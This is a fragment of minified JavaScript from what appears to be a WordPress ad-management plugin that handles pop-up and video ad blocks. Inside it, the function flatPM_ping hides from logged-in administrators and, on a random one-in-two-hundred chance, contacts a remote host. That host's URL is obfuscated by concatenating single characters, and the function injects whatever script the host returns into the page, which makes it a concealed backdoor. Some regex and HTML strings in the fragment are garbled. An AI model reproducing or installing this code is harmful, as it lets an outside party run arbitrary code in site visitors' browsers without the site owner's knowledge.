'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};